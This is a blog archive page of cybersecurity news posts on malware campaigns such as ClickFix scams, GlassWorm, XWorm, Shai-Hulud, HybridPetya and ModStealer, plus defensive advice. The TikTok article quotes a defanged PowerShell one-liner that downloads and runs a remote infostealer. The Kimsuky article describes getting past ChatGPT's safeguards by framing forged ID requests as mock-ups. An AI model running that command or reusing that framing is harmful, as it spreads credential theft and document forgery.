Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label malware. Show all posts
User Security
malware Photoshop Scam Social Engineering TikTok User Security

TikTok 'Free Photoshop' Scam Steals User Data via Malicious Commands

 

A sophisticated scam targeting TikTok users is exploiting the platform's reach to steal personal data by promising free access to expensive software like Adobe Photoshop. Cybercriminals are using a social engineering technique called ClickFix to trick victims into executing malicious commands that install information-stealing malware on their systems.

The scam operates through TikTok videos that demonstrate seemingly simple technical tricks to activate premium software, including Adobe Photoshop, Microsoft Windows, Discord Nitro, and other popular applications. These videos instruct users to run specific PowerShell commands on their Windows devices, with instructions that appear to be legitimate software activation methods. One example command involves executing iex (irm slmgr[.]win/photoshop), which fetches and runs malicious code from remote servers.

ClickFix attacks differ significantly from traditional phishing campaigns by guiding users through the process of infecting their own devices rather than simply tricking them into clicking malicious links. This social engineering approach exploits users' familiarity with solving minor technical issues, CAPTCHA checks, and human verification processes, making the scam appear more legitimate. Microsoft research indicates that since 2024, ClickFix has been used in nearly half of all recorded cyberattacks, surpassing phishing in popularity among cybercriminals.

When users execute the provided commands, they unknowingly download and install AuroStealer, a Trojan malware specifically designed to harvest sensitive information. This infostealer collects passwords, browser credentials, authentication cookies, cryptocurrency wallet data, and other application credentials from infected systems. The malware establishes persistence through scheduled tasks and uses self-compiling techniques to inject shellcode directly into memory, evading detection by security tools.

TikTok's short-form content delivery system and reputation for hosting legitimate technical how-to content makes it an ideal platform for this type of scam. The platform's viral nature enables these malicious videos to accumulate hundreds of likes and reach thousands of viewers before detection, with cybersecurity researcher Xavier Mertens identifying the ongoing campaign. The campaigns have been active since at least May 2025, with marked increases in activity observed through October 2025.

Security experts strongly advise users never to run commands on their machines from TikTok or other social media networks. Because these commands are executed locally on user systems, many security tools and browsers cannot easily detect them, making prevention through user education critical. Organizations should implement PowerShell execution restrictions, monitor scheduled tasks, and block known malicious domains to protect against these threats.
Read more »
Supply Chain Attack
GitHub GlassWorm malware OpenVSX Supply Chain Attack

GlassWorm Malware Exploits Invisible Unicode to Infect VS Code Extensions

 

A major and ongoing supply-chain attack is currently targeting developers through the OpenVSX and Microsoft Visual Studio Code (VS Code) extension marketplaces via a self-spreading malware dubbed "GlassWorm" that has triggered an estimated 35,800 installations to date. 

The campaign leverages novel techniques, such as embedding malicious code within invisible Unicode characters, enabling it to bypass detection and make the threats literally invisible in code editors. GlassWorm not only infects extensions, but also uses compromised accounts to further propagate itself, posing an accelerating risk through the dependency and update mechanisms of these platforms.

The malware focuses on stealing credentials for GitHub, npm, and OpenVSX accounts, as well as harvesting cryptocurrency wallet information from 49 different extensions. It then escalates the compromise by deploying a SOCKS proxy on infected machines, facilitating covert malicious traffic, and by installing HVNC (Hidden Virtual Network Computing) clients for undetectable remote access. 

GlassWorm leverages a hardcoded Solana blockchain wallet that participates in transactions used to distribute base64-encoded links pointing to its next-stage payload, referred to by researchers as the obfuscated "ZOMBI" module. Once installed, ZOMBI transforms the workstation into a node of a decentralized criminal infrastructure, enabling persistent and stealthy cybercriminal operations.

Unique for its resilience, GlassWorm's operators use the Solana blockchain as the primary command-and-control channel, making takedown efforts extremely challenging due to the blockchain’s decentralized, persistent, and anonymous nature. Secondary methods for controlling infected hosts include embedding payload links in Google Calendar event titles and directly contacting specific IP addresses (e.g., 217.69.3[.]218). To ensure redundancy and robust communication, the malware also incorporates BitTorrent’s Distributed Hash Table (DHT).

Researchers at Koi Security have identified at least eleven infected extensions on OpenVSX, with some still available for download as of reporting, and one on Microsoft’s VS Code Marketplace. Notably, the auto-update feature in VS Code means users can become infected without any interaction—the malicious version of extensions is silently pushed to all endpoints. Microsoft quickly removed the compromised extension following the alert, while some extension publishers have issued security updates.

These attacks follow a wider trend, echoing last month’s Shai-Hulud worm attack that affected 187 npm packages. Koi Security warns that the sophistication, propagation methods, and resilience of GlassWorm represent a significant escalation in the threat landscape, underscoring the urgent need for enhanced supply-chain security and vigilant monitoring.
Read more »
North Korea
Advanced Social Engineering Blockchain Google malware North Korea

Hackers Exploit Blockchain Networks to Hide and Deliver Malware, Google Warns

 



Google’s Threat Intelligence Group has uncovered a new wave of cyberattacks where hackers are using public blockchains to host and distribute malicious code. This alarming trend transforms one of the world’s most secure and tamper-resistant technologies into a stealthy channel for cybercrime.

According to Google’s latest report, several advanced threat actors, including one group suspected of operating on behalf of North Korea have begun embedding harmful code into smart contracts on major blockchain platforms such as Ethereum and the BNB Smart Chain. The technique, known as “EtherHiding,” allows attackers to conceal malware within the blockchain itself, creating a nearly untraceable and permanent delivery system.

Smart contracts were originally designed to enable transparent and trustworthy transactions without intermediaries. However, attackers are now exploiting their immutability to host malware that cannot be deleted or blocked. Once malicious code is written into a blockchain contract, it becomes permanently accessible to anyone who knows how to retrieve it.

This innovation replaces the need for traditional “bulletproof hosting” services, offshore servers that cybercriminals once used to evade law enforcement. By using blockchain networks instead, hackers can distribute malicious software at a fraction of the cost, often paying less than two dollars per contract update.

The decentralized nature of these systems eliminates any single point of failure, meaning there is no authority capable of taking down the malicious data. Even blockchain’s anonymity features benefit attackers, as retrieving code from smart contracts leaves no identifiable trace in transaction logs.


How the Attacks Unfold

Google researchers observed that hackers often begin their campaigns with social engineering tactics targeting software developers. Pretending to be recruiters, they send job offers that require the victims to complete “technical tasks.” The provided test files secretly install the initial stage of malware.

Once the system is compromised, additional malicious components are fetched directly from smart contracts stored on Ethereum or BNB Smart Chain. This multi-layered strategy enables attackers to modify or update their payloads anytime without being detected by conventional cybersecurity tools.

Among the identified actors, UNC5342, a North Korea-linked hacking collective, uses a downloader called JadeSnow to pull secondary payloads hidden within blockchain contracts. In several incidents, the group switched between Ethereum and BNB Smart Chain mid-operation; a move possibly motivated by lower transaction fees or operational segmentation. Another financially driven group, UNC5142, has reportedly adopted the same approach, signaling a broader trend among sophisticated threat actors.


The findings stress upon how cybercriminals are reimagining blockchain’s purpose. A tool built for transparency and trust is now being reshaped into an indestructible infrastructure for malware delivery.

Analysts also note that North Korea’s cyber operations have become more advanced in recent years. Blockchain research firm Elliptic estimated earlier this month that North Korean-linked hackers have collectively stolen over $2 billion in digital assets since early 2025.

Security experts warn that as blockchain adoption expands, defenders must develop new strategies to monitor and counter such decentralized threats. Traditional takedown mechanisms will no longer suffice when malicious data resides within a public, unchangeable ledger.



Read more »
XWorm malware
data theft malware malware Phishing Campaigns ransomware plugins XWorm 6.5 XWorm backdoor XWorm malware

New XWorm Malware Variants Emerge in Phishing Campaigns with Advanced Plugin Capabilities

 

New variants of the XWorm backdoor malware are being actively spread through phishing campaigns after its original creator, known as XCoder, abandoned the project last year.

The latest editions — XWorm 6.0, 6.4, and 6.5 — have been adopted by multiple cybercriminal groups. These updated versions include plugin support that enables a wide range of malicious activities, from data theft and remote system access to file encryption and decryption.

The most recent release developed by XCoder was version 5.6, which contained a remote code execution (RCE) vulnerability. The newly distributed variants reportedly fix that flaw while introducing enhanced attack features.

First detected in 2022, XWorm gained notoriety for its modular structure and broad feature set. It’s primarily used to harvest sensitive data such as passwords, cryptocurrency wallets, and financial information. The malware can also record keystrokes, extract clipboard data, perform DDoS attacks, and deliver other malicious payloads.

After XCoder deleted their Telegram channels, cracked versions of the malware began circulating widely, with various threat actors distributing them. In fact, one campaign even used XWorm itself as bait to target less-experienced hackers—infecting over 18,000 systems globally, primarily across Russia, the U.S., India, Ukraine, and Turkey.

A new version of XWorm appeared on a hacker forum, advertised by a user named XCoderTools, who offered access for a $500 lifetime subscription. Although it’s unclear if this is the same developer, the user claimed that the new versions fixed the RCE issue and introduced multiple updates.

Cybersecurity researchers at Trellix have observed a rise in XWorm samples on VirusTotal since June, suggesting the malware’s increasing popularity among threat actors.

In one campaign, XWorm was distributed using malicious JavaScript that executed a PowerShell script capable of bypassing Microsoft’s Antimalware Scan Interface (AMSI) to install the backdoor.

According to Trellix’s September report, “the XWorm malware infection chain has evolved to include additional techniques beyond traditional email-based attacks.” While .LNK files and email attachments remain common entry points, newer variants disguise themselves as legitimate executables — even mimicking applications like Discord.

“This marks a shift towards combining social engineering with technical attack vectors for greater effectiveness,” Trellix explained.

Further analyses revealed campaigns using AI-themed phishing lures and a modified version of ScreenConnect, as well as cases where malicious Excel files (.XLAM) embedded with shellcode delivered the payload.

Trellix researchers uncovered over 35 plugins associated with the latest XWorm versions, significantly expanding its functions — including a ransomware component.

The Ransomware.dll plugin allows attackers to lock victims’ files, demand payment, and customize ransom notes, wallpaper messages, and Bitcoin wallet details. The encryption avoids system-critical directories, focusing on user folders like %USERPROFILE% and Documents. Encrypted files are appended with the .ENC extension, while a ransom instruction HTML file is dropped on the desktop.

Code analysis revealed similarities between XWorm’s ransomware module and the NoCry ransomware from 2021, both using the same encryption methods (AES-CBC with 4096-byte blocks).

Beyond ransomware, other identified modules include:

  • RemoteDesktop.dll – Enables full remote control sessions.
  • Stealer.dll, Chromium.dll, Recovery.dll – Extract credentials and application data.
  • FileManager.dll – Grants file system access and manipulation.
  • Shell.dll – Executes commands through hidden CMD processes.
  • Webcam.dll – Records or verifies the infected system through webcam access.
  • TCPConnections.dll & ActiveWindows.dll – Send live system and network data to command servers.

With modules designed to steal data from more than 35 browsers, email clients, and crypto wallets, the malware represents a serious risk to both individuals and organizations.

Trellix recommends a multi-layered cybersecurity defense, including EDR solutions for detecting malicious behavior, and email/web gateways to block droppers. Network monitoring tools can also help identify communications with command-and-control (C2) servers and prevent data exfiltration.
Read more »
Windows
AnonDoor Confucius espionage malware Windows

Confucius Espionage: Gang Hijacks to Attack Windows Systems Via Malware


Confucius gang strikes again

The Confucius hacking gang, infamous for its cyber-espionage operations and alleged state-sponsored links, has advanced its attack tactics in recent times, shifting from document stealers such as WooperStealer to advanced Python-based backdoors like AnonDoor malware. 

The testimony to this is the December 2024 campaign, which showed the gang’s highly advanced engineering methods, using phishing emails via malicious PowerPoint presentations (Document.ppsx) that showed "Corrupted Page” notification to victims. 

Attack tactic

“The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities. Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness,” FortiGuard Labs said.

The infected file consisted of embedded OLE objects that prompted a VBScript command from remote infrastructure, starting a malicious chain.

FortiGuard Labs discovered how this gang has attacked Office documents and infected LNK files to damage Windows systems throughout the South Asian region, including organizations in Pakistan. The attack tactic uses DLL side-loading; the malware imitates genuine Windows commands such as fixmapi.exe, to user directories for persistence. 

About LNK-based attacks

Earlier this year, Confucius moved to disguise infected LNK files as genuine documents such as “Invoice_Jan25.pdf.lnk.” These documents trigger PowerShell commands that install an infected DLL and fake PDF documents via remote servers, creating a disguised, authentic file access while building backdoor access.

These files execute PowerShell commands that download malicious DLLs and decoy PDF documents from remote servers, maintaining the illusion of legitimate file access while establishing backdoor access. The downloaded DLL makes persistence channels and creates Base64-coded remote host addresses for payload deployment. 

Findings

The study found that the final payload remained WooperStealer, modified to extract different file types such as archives, images, documents, and email files with different extensions.

One major development happened in August 2025 with AnonDoor, an advanced Python-based backdoor, different from older NET-based tools.

Plan forward

According to Fortinet, “the layered attack chain leverages encoded components, DLL side-loading, and scheduled task persistence to secure long-term access and exfiltrate sensitive data while minimizing visibility.” 

Organizations are advised to be vigilant against different attack tactics, as cyber criminal gangs keep evolving their methods to escape detection. 

Read more »
Supply Chain Attack
Malicious Campaign malware NPM Package Shai-Hulud Supply Chain Attack

Shai-Hulud Worm Strikes: Self-Replicating Malware Infects Hundreds of NPM Packages

 

A highly dangerous self-replicating malware called “Shai-Hulud” has recently swept through the global software supply chain, becoming one of the largest incidents of its kind ever documented. 

Named after the sandworms in the Dune series, this worm has infected hundreds of open-source packages available on the Node Package Manager (NPM) platform, which is widely used by JavaScript developers and organizations worldwide. 

Shai-Hulud distinguishes itself from previous supply chain attacks by being fully automated: it propagates by stealing authentication tokens from infected systems and using them to compromise additional software packages, thus fueling a rapid, worm-like proliferation.

The attack vector starts when a developer or system installs a poisoned NPM package. The worm then scans the environment for NPM credentials, specifically targeting authentication tokens, which grant publishing rights. Upon finding such tokens, it not only corrupts the compromised package but also infects up to twenty of the most popular packages accessible to that credential, automatically publishing malicious versions to the NPM repository. 

This creates a domino effect—each newly infected package targets additional developers, whose credentials are then used to expand the worm’s grip, further cascading the spread across the global development community.

Researchers from various security firms, including CrowdStrike and Aikido, were among those affected, though CrowdStrike quickly removed impacted packages and rotated its credentials. Estimates of the scale vary: some report at least 180 packages infected, while others cite figures above 700, underscoring the scope and severity of the outbreak. 

Major tools used by the worm, such as TruffleHog, enabled it to scan compromised systems for a broad array of secrets, including API and SSH keys, as well as cloud tokens for AWS, Azure, and Google Cloud, making its impact particularly far-reaching.

Response to the attack involved urgent removals of poisoned software, rotations of compromised credentials, and investigations by platform maintainers. Security experts argued for immediate industry reforms, recommending that package managers like NPM require explicit human approval and use robust, phishing-resistant two-factor authentication on all publishing operations. 

The attack also exposed the vulnerabilities inherent in modern open-source ecosystems, where a single compromised credential or package can threaten countless downstream systems and organizations. This incident highlights the evolving tactics of cyber attackers and the critical need for improved security measures throughout the global software supply chain.
Read more »
Windows
2FA Antivirus Computer Devices malware Windows

How Six Simple Habits Can Keep Your Computer Safe From Malware

 



For many, the first encounter with malware comes during student years, often through experiments with “free” software or unprotected internet connections like USB tethering. The result is almost always the same: a badly infected system that needs a complete reinstall of Windows. That hard lesson shows why consistent security habits matter. Fourteen years and several computers later, users who follow basic precautions rarely face malware again.


1. Be selective with downloads

Unsafe downloads are the main entry point for malware. Cracked or “premium” software shared on random forums can secretly install hidden programs, such as cryptocurrency mining tools, that hijack your computer’s resources. The safest option is to download software only from official websites, verified GitHub repositories, or trusted app stores. If paying for premium tools is not possible, free alternatives are widely available. For example, LibreOffice can replace Microsoft Office, GIMP is a strong substitute for Photoshop, and many platforms provide safe, free video games.


2. Keep your antivirus protection updated

Antivirus tools are only effective if they are current. On Windows, the built-in security program updates automatically, scanning files against Microsoft’s threat database and blocking or quarantining suspicious files before they run. Unlike many third-party programs, Windows Security works quietly in the background without constant interruptions or slowing your device. Whether you choose the built-in system or another provider, keeping it updated is essential.


3. Approach email attachments with caution

Phishing emails often look convincing, sometimes copying entire designs from services like PayPal. In one example, a fake message claimed a new address had been added to an account and urged immediate action. The scam was revealed by its sender address — “paypal-support@secureverify-payment.com” instead of a genuine PayPal domain. Today’s phishing attempts go beyond suspicious links, with QR codes, PDFs, or fake DocuSign prompts that ask for login details. To protect yourself, disable automatic image loading, never open unexpected attachments, and always confirm unusual requests with the sender through another trusted method.


4. Avoid public Wi-Fi without protection

Public Wi-Fi in airports, cafés, hotels, or libraries may be convenient, but it is also risky. Other users on the same network can intercept traffic, and cybercriminals often set up fake hotspots with names like “Free_Airport_WiFi” to trick unsuspecting users. A safer approach is to use mobile data or a personal hotspot. If you must connect to public Wi-Fi, always use a virtual private network (VPN) to encrypt your traffic, and avoid logging into banking or other sensitive accounts until you are on a trusted network.


5. Keep Windows updated

Those frequent updates and restarts on Windows serve a purpose: patching security vulnerabilities. Once Microsoft releases a fix, attackers study it to find the weakness and then target systems that delay updating. While feature updates can be postponed, security patches should never be skipped. Enabling automatic updates is the most reliable way to stay protected.


6. Strengthen account security

Reusing the same password across multiple accounts is one of the fastest ways to be compromised through credential stuffing. Use a password manager to generate unique logins, and enable two-factor authentication (2FA) on any account involving personal or financial information. An even stronger option is to adopt passkeys, which use device biometrics and cryptographic keys. Passkeys cannot be phished, reused, or stolen, making them far safer than traditional passwords.


Staying free from malware does not require expensive tools or advanced skills. By practicing safe downloading, keeping antivirus tools and operating systems updated, approaching emails cautiously, protecting yourself on public networks, and securing accounts with strong authentication, you can keep your devices safe for years to come.



Read more »
State-Sponsored Espionage
AI Misuse Cybersecurity Data Theft Deepfake Attacks Generative AI Kimsuky malware North Korean Hackers Phishing Campaigns State-Sponsored Espionage

North Korean Threat Actors Leverage ChatGPT in Deepfake Identity Scheme


North Korean hackers Kimsuky are using ChatGPT to create convincing deepfake South Korean military identification cards in a troubling instance of how artificial intelligence can be weaponised in state-backed cyber warfare, indicating that artificial intelligence is becoming increasingly useful in cyber warfare. 

As part of their cyber-espionage campaign, the group used falsified documents embedded in phishing emails targeting defence institutions and individuals, adding an additional layer of credibility to their espionage activities. 

A series of attacks aimed at deceiving recipients, delivering malicious software, and exfiltrating sensitive data were made more effective by the use of AI-generated IDs. Security monitors have categorised this incident as an AI-related hazard, indicating that by using ChatGPT for the wrong purpose, the breach of confidential information and the violation of personal rights directly caused harm. 

Using generative AI is becoming increasingly common in sophisticated state-sponsored operations. The case highlights the growing concerns about the use of generative AI in sophisticated operations. As a result of the combination of deepfake technology and phishing tactics, these attacks are harder to detect and much more damaging. 

Palo Alto Networks' Unit 42 has observed a disturbing increase in the use of real-time deepfakes for job interviews, in which candidates disguise their true identities from potential employers using this technology. In their view, the deepfake tactic is alarmingly accessible because it can be done in a matter of hours, with just minimal technical know-how, and with inexpensive consumer-grade hardware, so it is alarmingly accessible and easy to implement. 

The investigation was prompted by a report that was published in the Pragmatic Engineer newsletter that described how two fake applicants who were almost hired by a Polish artificial intelligence company raised suspicions that the candidates were being controlled by the same individual as deepfake personas. 

As a result of Unit 42’s analysis, these practices represent a logical progression from a long-standing North Korean cyber threat scheme, one in which North Korean IT operatives attempt to infiltrate organisations under false pretences, a strategy well documented in previous cyber threat reports. 

It has been repeatedly alleged that the hacking group known as Kimsuky, which operated under the direction of the North Korean state, was involved in espionage operations against South Korean targets for many years. In a 2020 advisory issued by the U.S. Department of Homeland Security, it was suggested that this group might be responsible for obtaining global intelligence on Pyongyang's behalf. 

Recent research from a South Korean security firm called Genians illustrates how artificial intelligence is increasingly augmented into such operations. There was a report published in July about North Korean actors manipulating ChatGPT to create fake ID cards, while further experiments revealed that simple prompt adjustments could be made to override the platform's built-in limitations by North Korean actors. 

 It follows a pattern that a lot of people have experienced in the past: Anthropic disclosed in August that its Claude Code software was misused by North Korean operatives to create sophisticated fake personas, pass coding assessments, and secure remote positions at multinational companies. 

In February, OpenAI confirmed that it had suspended accounts tied to North Korea for generating fraudulent resumes, cover letters, and social media content intended to assist with recruitment efforts. These activities, according to Genians director Mun Chong-hyun, highlight the growing role AI has in the development and execution of cyber operations at many stages, from the creation of attack scenarios, the development of malware, as well as the impersonation of recruiters and targets. 

A phishing campaign impersonating an official South Korean military account (.mil.kr) has been launched in an attempt to compromise journalists, researchers, and human rights activists within this latest campaign. To date, it has been unclear how extensive the breach was or to what extent the hackers prevented it. 

Officially, the United States assert that such cyber activities are a part of a larger North Korea strategy, along with cryptocurrency theft and IT contracting schemes, that seeks to provide intelligence as well as generate revenue to circumvent sanctions and fund the nuclear weapons program of the country. 

According to Washington and its allies, Kimsuky, also known as APT43, a North Korean state-backed cyber unit that is suspected of being responsible for the July campaign, was already sanctioned by Washington and its allies for its role in promoting Pyongyang's foreign policy and sanction evasion. 

It was reported by researchers at South Korean cybersecurity firm Genians that the group used ChatGPT to create samples of government and military identification cards, which they then incorporated into phishing emails disguised as official correspondence from a South Korean defense agency that managed ID services, which was then used as phishing emails. 

Besides delivering a fraudulent ID card with these messages, they also delivered malware designed to steal data as well as allow remote access to compromised systems. It has been confirmed by data analysis that these counterfeit IDs were created using ChatGPT, despite the tool's safeguards against replicating government documents, indicating that the attackers misinterpreted the prompts by presenting them as mock-up designs. 

There is no doubt that Kimsuky has introduced deepfake technology into its operations in such a way that this is a clear indication that this is a significant step toward making convincing forgeries easier by using generative AI, which significantly lowers the barrier to creating them. 

It is known that Kimsuky has been active since at least 2012, with a focus on government officials, academics, think tanks, journalists, and activists in South Korea, Japan, the United States, Europe, and Russia, as well as those affected by North Korea's policy and human rights issues. 

As research has shown, the regime is highly reliant on artificial intelligence to create fake summaries and online personas. This enables North Korean IT operatives to secure overseas employment as well as perform technical tasks once they are embedded. There is no doubt that such operatives are using a variety of deceptive practices to obscure their origins and evade detection, including artificial intelligence-powered identity fabrication and collaboration with foreign intermediaries. 

The South Korean foreign ministry has endorsed that claim. It is becoming more and more evident that generative AI is increasingly being used in cyber-espionage, which poses a major challenge for global cybersecurity frameworks: assisting citizens in identifying and protecting themselves against threats not solely based on technical sophistication but based on trust. 

Although platforms like ChatGPT and other large language models may have guardrails in place to protect them from attacks, experts warn that adversaries will continue to seek out weaknesses in the systems and adapt their tactics through prompt manipulation, social engineering, and deepfake augmentation in an effort to defeat the system. 

Kimsuky is an excellent example of how disruptive technologies such as artificial intelligence and cybercrime erode traditional detection methods, as counterfeit identities, forged credentials, and distorted personas blur the line between legitimate interaction and malicious deception, as a result of artificial intelligence and cybercrime. 

The security experts are urging the public to take action by using a multi-layered approach that combines AI-driven detection tools, robust digital identity verification, cross-border intelligence sharing, and better awareness within targeted sectors such as defence, academia, and human rights industries. 

Developing AI technologies together with governments and private enterprises will be critical to ensuring they are harnessed responsibly while minimising misuse of these technologies. It is clear from this campaign that as adversaries continue to use artificial intelligence to sharpen their attacks, defenders must adapt just as fast to maintain trust, privacy, and global security as they do against adversaries.
Read more »
UEFI Secure Boot bypass
EFI System Partition malware HybridPetya ransomware malware UEFI Secure Boot bypass

HybridPetya Ransomware Exploits Secure Boot Vulnerability to Infect Windows Systems

 

A newly identified ransomware variant called HybridPetya has emerged with the ability to bypass UEFI Secure Boot protections and install a malicious bootkit on the EFI System Partition.

The malware takes inspiration from the infamous Petya and NotPetya strains that caused widespread damage in 2016 and 2017 by encrypting systems and blocking Windows from starting, with no recovery option for victims.

According to researchers at cybersecurity company ESET, a sample of HybridPetya was uploaded to VirusTotal. While it may currently be a proof-of-concept, an experimental project, or an early-stage cybercrime tool, its discovery highlights the growing risk of UEFI bootkits with Secure Boot bypass capabilities. Similar threats include BlackLotus, BootKitty, and Hyper-V Backdoor.

HybridPetya not only mimics the attack chain and interface of its predecessors but also introduces advanced features like installation in the EFI System Partition and a Secure Boot bypass using the CVE-2024-7344 vulnerability.

ESET, which discovered this flaw in January 2025, explains that the issue stemmed from Microsoft-signed applications that attackers could exploit to load bootkits despite Secure Boot being enabled. When executed, HybridPetya checks if the system uses UEFI with GPT partitioning before dropping several malicious files into the EFI partition, including:
  • \EFI\Microsoft\Boot\config (encryption flag, key, nonce, victim ID)
  • \EFI\Microsoft\Boot\verify (validates decryption key)
  • \EFI\Microsoft\Boot\counter (tracks encryption progress)
  • \EFI\Microsoft\Boot\bootmgfw.efi.old (backup of Windows bootloader)
  • \EFI\Microsoft\Boot\cloak.dat (XORed bootkit in Secure Boot bypass variant)
The ransomware also replaces the original bootloader with the vulnerable reloader.efi and deletes \EFI\Boot\bootx64.efi. If a ransom is paid, the saved bootloader can restore normal system startup.

Upon deployment, HybridPetya causes a fake Blue Screen of Death (BSOD), reboots the device, and launches the malicious bootkit. It then encrypts MFT clusters using a Salsa20 key from the config file while displaying a fake CHKDSK screen, similar to NotPetya.

After encryption, another reboot follows, and victims see a ransom note demanding $1,000 in Bitcoin. In return, they are promised a 32-character decryption key to restore files and the original bootloader.

Currently, HybridPetya has not been linked to real-world attacks, but security experts warn it could be weaponized in future campaigns against unpatched Windows systems. Indicators of compromise (IoCs) have been published on GitHub to help organizations defend against this ransomware.

Microsoft patched CVE-2024-7344 in the January 2025 Patch Tuesday update, securing systems that have applied the fix. Experts also recommend maintaining offline backups as a strong defense against ransomware incidents.
Read more »
undetectable malware
Apple device security cross-platform infostealer Mac Malware macOS malware 2025 malware ModStealer Mosyle security undetectable malware

New Cross-Platform Malware ‘ModStealer’ Targets macOS, Windows, and Linux Users

 

After cautioning 9to5Mac last month about undetectable Mac malware hidden in a fake PDF converter site, Mosyle—an Apple device management and security firm—has revealed another dangerous threat. The newly discovered malware, named ModStealer, has gone unnoticed by major antivirus tools since it first surfaced on VirusTotal nearly a month ago.

In an exclusive briefing with 9to5Mac, Mosyle explained that ModStealer is not limited to macOS. Instead, it is a cross-platform infostealer designed with a single purpose: stealing sensitive data.

According to Mosyle’s research, attackers are distributing ModStealer through malicious job recruiter ads aimed at developers. The malware leverages a heavily obfuscated JavaScript file built with NodeJS, making it invisible to signature-based security systems. It threatens not just Mac users but also Windows and Linux environments.

The primary mission of ModStealer is data exfiltration. It specifically targets cryptocurrency wallets, login credentials, system configuration files, and digital certificates. Mosyle uncovered code tailored to 56 different browser wallet extensions—including Safari—designed to harvest private keys and other confidential account information.

Beyond data theft, ModStealer can perform clipboard hijacking, screen capturing, and even remote code execution. While the first two are already dangerous, the latter grants attackers nearly full control of compromised systems.

What makes this malware especially concerning is its stealth. Because signature-based tools fail to detect it, ModStealer can silently operate in the background. On macOS, it achieves persistence by exploiting Apple’s launchctl tool, embedding itself as a LaunchAgent to continuously monitor activities and send stolen information to a remote server. Mosyle traced the data server to Finland but found links to infrastructure in Germany, suggesting an attempt to disguise the attackers’ true location.

Mosyle also believes ModStealer may be offered as part of the growing Malware-as-a-Service (MaaS) industry, where cybercriminals develop malicious tools and sell them to affiliates with little technical expertise. These affiliates can then deploy the malware for their own objectives. This approach has become increasingly popular, especially for infostealers. Jamf previously reported a 28% rise in infostealer malware earlier this year, calling it the most common Mac malware family in 2025.

“For security professionals, developers, and end users alike, this serves as a stark reminder that signature-based protections alone are not enough. Continuous monitoring, behavior-based defenses, and awareness of emerging threats are essential to stay ahead of adversaries,” Mosyle warns.
Read more »
Mandiant cybersecurity
ChillyHell malware Jamf Threat Labs report Mac Malware Mac security updates malware Mandiant cybersecurity

Jamf Threat Labs Uncovers New Activity of Mac Malware ‘ChillyHell’

 

Jamf Threat Labs has published a new report highlighting the resurgence of Mac malware known as ChillyHell. Initially detected in 2021 and later privately disclosed by cybersecurity company Mandiant in 2023, the malware resurfaced this past May when Jamf identified a fresh sample on VirusTotal—a platform used for analyzing suspicious files and URLs.

Once a Mac is compromised, ChillyHell can steal sensitive data such as usernames and passwords. What sets this malware apart is its ability to use timestomping—altering file timestamps—and its capability to switch C2 protocols to bypass detection. According to Jamf, “the developer certificates associated with ChillyHell have been revoked.” While this action restricts its ongoing development, it doesn’t mean the malware has completely disappeared from circulation.

How Mac Users Can Stay Protected from Malware

To minimize the risk of infection, avoid downloading applications from unverified sources such as GitHub or third-party websites. The Mac App Store remains the safest place to install apps, as Apple rigorously vets software before publishing. Alternatively, purchase apps directly from trusted developers via their official websites.

Using cracked or pirated software dramatically increases the risk of malware exposure. Users should also avoid clicking links in unsolicited emails or messages. If a message appears legitimate, verify the sender’s email and check the link carefully. On a Mac, you can Control-click a link, choose Copy Link Address, and paste it into a text editor to preview the real URL before visiting.

For additional security, Macworld offers resources such as a guide on whether antivirus software is necessary, a detailed list of Mac viruses and trojans, and a comparison of the best Mac security software available. Apple also provides built-in protections in macOS and releases regular security updates. Installing these updates promptly is essential, as Apple reissues corrected patches if any flaws are found.
Read more »
XWorm trojan
HP Wolf Security report 2025 Living off the land attacks Lumma Stealer malware XWorm trojan

Cybercriminals Hide Malware in Trusted Tools and File Formats, HP Wolf Security Warns

 


Attackers are increasingly disguising malicious activity inside everyday business tools and file formats that employees and IT teams typically trust. According to the latest HP Wolf Security Threat Insights Report (Q2 2025), threat actors are refining their strategies to blend in with legitimate processes, making it more difficult for security defenses to keep up.

One of the standout campaigns observed in Q2 2025 involved the XWorm remote access trojan (RAT). Instead of deploying custom malware directly, attackers chained together several built-in Windows utilities. These “living off the land” binaries were used to run commands, transfer files, and decode hidden malware, all while evading many security alerts.

The final XWorm payload was concealed inside the pixels of a genuine image from a trusted website. Attackers then used PowerShell scripts to extract the hidden code, with MSBuild executing the malware. Once complete, attackers gained full remote access and data-stealing capabilities using only tools already present on the system.

“Living off the land techniques are notoriously difficult for security teams because it’s hard to tell green flags from red – i.e. legitimate activity versus an attack… Even the best detection will miss some threats, so defense-in-depth with containment and isolation is essential to trap attacks before they can cause harm,” explained Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc.

Phishing emails continue to dominate, accounting for 61% of threats reaching endpoints. Attackers are exploiting document formats to trick victims:

  • Invoice-themed campaigns used SVG attachments imitating Adobe Acrobat, complete with animations, before luring users into downloading malware. The attack installed a lightweight reverse shell, enabling remote execution and data theft.
  • PDF-based lures displayed blurred invoices and download prompts, ultimately dropping a malicious Visual Basic Encoded script hidden in a ZIP archive. This technique stored malware components in the Windows Registry, making detection harder. Victims were infected with MassLogger, a credential stealer, and in some French cases, a secondary RAT named ModiRAT

Attackers are also reviving outdated file formats to bypass detection. Compiled HTML Help (.chm) files, once used for Windows manuals, are being weaponized with embedded scripts to deliver multi-stage infections, often leading to XWorm.

Shortcut files (LNKs) disguised as PDFs inside phishing ZIPs were also spotted. Instead of opening documents, the shortcuts launched malicious code that installed the Remcos RAT. In some campaigns, attackers even embedded payloads inside obsolete Program Information File (PIF) formats to further reduce suspicion.

Despite a major international takedown in May 2025, the Lumma Stealer malware resurfaced just a month later with fresh infrastructure. Attackers distributed it through IMG archives attached to phishing emails. When opened, these acted as virtual drives containing an HTML Application file disguised as an invoice. This eventually executed obfuscated PowerShell scripts, running Lumma Stealer in memory and bypassing disk-based security tools.

The findings underline how cybercriminals exploit trusted tools, realistic lures, and legacy file formats to bypass security. Traditional detection methods based on file signatures are no longer enough. Defense strategies must instead focus on monitoring behavior, persistence techniques, and system tool abuse.

“Attackers aren’t reinventing the wheel, but they are refining their techniques. Living-off-the-land, reverse shells and phishing have been around for decades, but today’s threat actors are sharpening these methods… You don’t have to drop a fully-fledged RAT when a simple, lightweight script will achieve the same effect. It’s simple, fast and often slips under the radar because it’s so basic,” said Alex Holland, Principal Threat Researcher, HP Security Lab.
Read more »
Remote Access Trojan
Cyber Security Cybersecurity Endpoint security Evasion Techniques malware MostereRAT phishing Remote Access Trojan

